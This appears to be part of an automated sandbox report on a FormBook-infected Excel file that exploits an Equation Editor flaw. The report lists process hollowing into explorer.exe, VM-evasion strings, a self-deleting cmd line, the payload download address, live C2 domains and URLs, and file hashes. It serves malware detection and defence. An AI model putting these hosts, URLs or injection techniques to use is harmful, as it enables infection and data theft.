      Source: explorer.exe, 00000009.00000000.487770072.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: VMWARE
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: explorer.exe, 00000009.00000000.499415292.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000009.00000000.523219714.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
      Source: explorer.exe, 00000009.00000000.505298411.00000000083A6000.00000004.00000001.sdmpBinary or memory string: .SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A826F8 mov eax, dword ptr fs:[00000030h]8_2_00A826F8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F526F8 mov eax, dword ptr fs:[00000030h]11_2_01F526F8
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00409B20 LdrLoadDll,8_2_00409B20
      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe; Domain query: www.americanstonesusa.com
      Source: C:\Windows\explorer.exe; Network Connect: 34.98.99.30 80
      Source: C:\Windows\explorer.exe; Domain query: www.realstyleworks.com
      Source: C:\Windows\explorer.exe; Domain query: www.plasticplank.com
      Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exe; Network Connect: 192.99.131.252 80
      Sample uses process hollowing technique
      Source: C:\Users\Public\vbc.exe; Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 2F0000
      Maps a DLL or memory area into another process
      Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exe; Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\Public\vbc.exe; Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
      Queues an APC in another process (thread injection)
      Source: C:\Users\Public\vbc.exe; Thread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\Public\vbc.exe; Thread register set: target process: 1764
      Source: C:\Users\Public\vbc.exe; Thread register set: target process: 1764
      Source: C:\Windows\SysWOW64\ipconfig.exe; Thread register set: target process: 1764
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe; Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exe; Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exe; Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Windows\SysWOW64\ipconfig.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmp; Binary or memory string: ProgmanG
      Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmp; Binary or memory string: !Progman
      Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmp; Binary or memory string: Program Manager<
      Source: C:\Users\Public\vbc.exe; Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
      Source: C:\Users\Public\vbc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match; File source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match; File source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match; File source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 122 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 11 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | System Information Discovery 113 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Extra Window Memory Injection 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

      Behavior Graph

      [Figure: behavior graph, ID 483668. Sample: ORDER CONFIRMATION.xlsx, Startdate: 15/09/2021, Architecture: WINDOWS, Score: 100. Process nodes: EXCEL.EXE and EQNEDT32.EXE started; EQNEDT32.EXE drops C:\Users\Public\vbc.exe and starts vbc.exe; vbc.exe starts two further vbc.exe processes; one of them starts ipconfig.exe and injects explorer.exe; ipconfig.exe starts cmd.exe.]

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label | Link
      ORDER CONFIRMATION.xlsx | 33% | Virustotal | | Browse
      ORDER CONFIRMATION.xlsx | 29% | ReversingLabs | Document-Word.Exploit.CVE-2017-11882 |

      Dropped Files

      Source | Detection | Scanner | Label | Link
      C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML | |

      Unpacked PE Files

      Source | Detection | Scanner | Label | Link | Download
      8.2.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains


      Contacted URLs


      URLs from Memory and Binaries


      Contacted IPs

      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      198.23.212.143 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
      34.102.136.180 | plasticplank.com | United States | 15169 | GOOGLEUS | false
      34.98.99.30 | realstyleworks.com | United States | 15169 | GOOGLEUS | false
      192.99.131.252 | americanstonesusa.com | Canada | 16276 | OVHFR | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 483668
Start date: 15.09.2021
Start time: 11:15:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 57s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: ORDER CONFIRMATION.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@12/19@22/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 23.7% (good quality ratio 22.8%)
• Quality average: 69.8%
• Quality standard deviation: 28.9%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 90
• Number of non-executed functions: 56
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Max analysis timeout: 600s exceeded, the analysis took too long
• Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 11:15:46 | API Interceptor | 62x Sleep call for process: EQNEDT32.EXE modified |
| 11:15:48 | API Interceptor | 125x Sleep call for process: vbc.exe modified |
| 11:16:22 | API Interceptor | 229x Sleep call for process: ipconfig.exe modified |
| 11:17:11 | API Interceptor | 1x Sleep call for process: explorer.exe modified |

Joe Sandbox View / Context

IPs

| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| 198.23.212.143 | ORDER CONFIRMATION.xlsx | malicious | 198.23.212.143/restore/vbc.exe |
| 198.23.212.143 | VINASHIP STAR.xlsx | malicious | 198.23.212.143/hkcmd/vbc.exe |
| 198.23.212.143 | MV NORDSPRING.xlsx | malicious | 198.23.212.143/ibm/vbc.exe |
| 192.99.131.252 | UiUIvFRxA8.exe | malicious | www.americanstonesusa.com/nthe/?pF=TiWkgH4RkF7GI6/xmtcRQySnot/hSP0U84AJ42MHKZz+hx9kgl2ssvJW7++40TiQRwdDqjcF6A==&OZU=kh_XEVoH4 |
| 192.99.131.252 | IDol28opjZ.exe | malicious | www.americanstonesusa.com/nthe/?Uzrhst=U4UTr&JBth_0D=TiWkgH4RkF7GI6/xmtcRQySnot/hSP0U84AJ42MHKZz+hx9kgl2ssvJW79Sooi+rWF0S |

Domains


ASN


JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 556544
Entropy (8bit): 7.182791197610268
Encrypted: false
SSDEEP: 12288:7WHCM2K4Cz8liFBdgtM6lf2vo45Rm5fv1zCln:h3CzeiDdIMAfEofftzk
MD5: 989933E361010648C467C6D7B6C2D812
SHA1: 3BD47D097B8CD69083445EB0417B0059FA806542
SHA-256: 34A89EDA5DD4AEF3EFB096011F27BBA7354B4C624D5DC01F4B43A18AC42D6AF4
SHA-512: F98B8337F527B49A4E5BD659CD6264D22F43C31EAAB55CCA4BF79EE2C5C5405D5CD78D1176759A0E0287E5FEB82675EF0D73DDA918FB9289ACC9D84DA466C60F
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
IE Cache URL: http://198.23.212.143/ddr/vbc.exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C03C88C.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category: dropped
Size (bytes): 8815
Entropy (8bit): 7.944898651451431
Encrypted: false
SSDEEP: 192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5: F06432656347B7042C803FE58F4043E1
SHA1: 4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256: 409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512: 358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious: false
Reputation: moderate, very likely benign file
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24B64F4E.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):84203
                                                                                      Entropy (8bit):7.979766688932294
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                      MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F791AF7.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D4B1A7A.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EA9D4E2.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):14198
                                                                                      Entropy (8bit):7.916688725116637
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                      Malicious:false
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CBE2925.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):8815
                                                                                      Entropy (8bit):7.944898651451431
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                      Malicious:false
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F46F433.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):33795
                                                                                      Entropy (8bit):7.909466841535462
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                                                      MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                                                      SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                                                      SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                                                      SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                                                      Malicious:false
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7383DB7B.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83C4F71D.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):14198
                                                                                      Entropy (8bit):7.916688725116637
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                      Malicious:false
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4ED7E41.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):7006
                                                                                      Entropy (8bit):7.000232770071406
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                                                      MD5:971312D4A6C9BE9B496160215FE59C19
                                                                                      SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                                                                      SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                                                                      SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                                                                      Malicious:false
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3FA08B4.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4E1B898.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):7006
                                                                                      Entropy (8bit):7.000232770071406
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                                                      MD5:971312D4A6C9BE9B496160215FE59C19
